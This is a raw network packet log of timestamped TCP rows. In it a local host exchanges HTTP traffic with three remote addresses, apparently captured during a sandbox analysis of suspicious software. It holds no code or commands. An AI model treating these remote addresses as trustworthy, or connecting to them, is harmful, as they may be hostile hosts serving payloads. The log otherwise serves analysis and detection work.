Apr 27, 2024 00:46:03.636214018 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636240959 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636265039 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636279106 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636316061 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636343956 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636352062 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636404037 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636439085 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636441946 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636480093 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636491060 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636518955 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636519909 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636559010 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636610985 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636610985 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636610985 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636611938 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636650085 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636662960 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636687040 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636699915 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636735916 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636796951 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636861086 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636900902 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636940956 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.636959076 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.636995077 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.637078047 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.637130976 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.637212038 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.637273073 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.637729883 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.637768984 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.637799978 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.637805939 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.637814045 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.637861013 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.637877941 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.637914896 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.637936115 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.637952089 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.637962103 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.638005972 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.638498068 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.638535976 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.638547897 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.638591051 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.638886929 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.638925076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.638942003 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.638983011 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.639050961 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.639089108 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.639106035 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.639126062 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.639142036 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.639182091 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.639394045 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.639432907 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.639450073 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.639484882 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.639525890 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.639565945 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.639588118 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.639621019 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.639985085 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.640023947 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.640047073 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.640074968 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.640075922 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.640130997 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.640172005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.640239000 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.640356064 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.640422106 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.640469074 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.640527010 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.640607119 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.640667915 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.641273022 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.641313076 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.641361952 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.641498089 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.641539097 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.641557932 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.641720057 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.641777039 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.641823053 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.641962051 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.642013073 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.807179928 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.807938099 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.808001041 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.808172941 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.808258057 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.808314085 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.808443069 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.808501005 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.808572054 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.808585882 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.808631897 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.808685064 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.808725119 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.808743954 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.808806896 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.808826923 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.808978081 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.809030056 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.809128046 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.809201002 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.809252977 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.809256077 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.809403896 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.809456110 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.809485912 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.809528112 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.809576035 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.809598923 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.809660912 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.809706926 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.809717894 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.809977055 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.810026884 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.810050011 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.810168028 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.810199022 CEST	80	49732	185.172.128.59	192.168.2.4
Apr 27, 2024 00:46:03.810216904 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:03.810276985 CEST	49732	80	192.168.2.4	185.172.128.59
Apr 27, 2024 00:46:04.812287092 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:04.814516068 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:04.983620882 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:04.983712912 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:04.983918905 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:05.010435104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.010502100 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.010574102 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.155158997 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:05.206186056 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.206229925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.206273079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.206321955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.206351995 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.206389904 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.206439018 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.206532001 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.206624985 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.206662893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.206672907 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.206736088 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.206778049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.206845045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.206962109 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.207005978 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.403711081 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.403753042 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.403790951 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.403831005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.403865099 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.403870106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.403908014 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.403930902 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.403944969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.403975010 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.403983116 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404021978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404043913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.404061079 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404220104 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404248953 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.404258013 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404298067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404320955 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.404335976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404375076 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404412031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404443026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.404450893 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404489040 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404499054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.404527903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404558897 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.404583931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.404740095 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.488857031 CEST	49675	443	192.168.2.4	173.222.162.32
Apr 27, 2024 00:46:05.535518885 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:05.535664082 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:05.537147045 CEST	49733	80	192.168.2.4	185.172.128.76
Apr 27, 2024 00:46:05.599436045 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599477053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599523067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599560976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599591970 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.599597931 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599636078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599667072 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.599730968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599771023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599796057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.599807978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599867105 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599899054 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.599904060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599944115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.599976063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.599982977 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600023031 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600054026 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600060940 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600115061 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600142002 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600152969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600192070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600225925 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600230932 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600270987 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600303888 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600311041 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600348949 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600384951 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600387096 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600425005 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600452900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600464106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600503922 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600533962 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600541115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600578070 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600608110 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600615978 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600653887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600682974 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600692034 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600729942 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600759983 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600768089 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600805044 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600838900 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600843906 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600872040 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600882053 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600919962 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600959063 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.600990057 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.600996971 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.601033926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.601047993 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.601109982 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.708096981 CEST	80	49733	185.172.128.76	192.168.2.4
Apr 27, 2024 00:46:05.797236919 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.797390938 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.797430992 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.797543049 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.797574043 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.797581911 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.797697067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.797720909 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.799004078 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799041986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799041986 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.799082994 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799112082 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.799120903 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799160004 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799191952 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.799197912 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799236059 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799261093 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.799272060 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799309969 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799345970 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799374104 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.799382925 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799421072 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.799448013 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.800321102 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.800796986 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.800831079 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.801107883 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.801270008 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.801300049 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.801307917 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.801424026 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.801455021 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.801462889 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.801502943 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.801537991 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.801767111 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.801796913 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.801805019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.801942110 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.801971912 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.801980019 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802135944 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802164078 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.802174091 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802273035 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802301884 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.802311897 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802437067 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802467108 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.802606106 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802644968 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802675009 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.802759886 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802802086 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802829027 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.802926064 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.802964926 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.803093910 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.803124905 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.803239107 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.803280115 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.803314924 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.803392887 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.803560972 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.803589106 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.803600073 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.803723097 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.803750038 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.803761959 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.803879976 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.803909063 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.804038048 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.804349899 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.804384947 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.804527998 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.804567099 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.804593086 CEST	49734	80	192.168.2.4	176.97.76.106
Apr 27, 2024 00:46:05.804687023 CEST	80	49734	176.97.76.106	192.168.2.4
Apr 27, 2024 00:46:05.804857016 CEST	80	49734	176.97.76.106	192.168.2.4
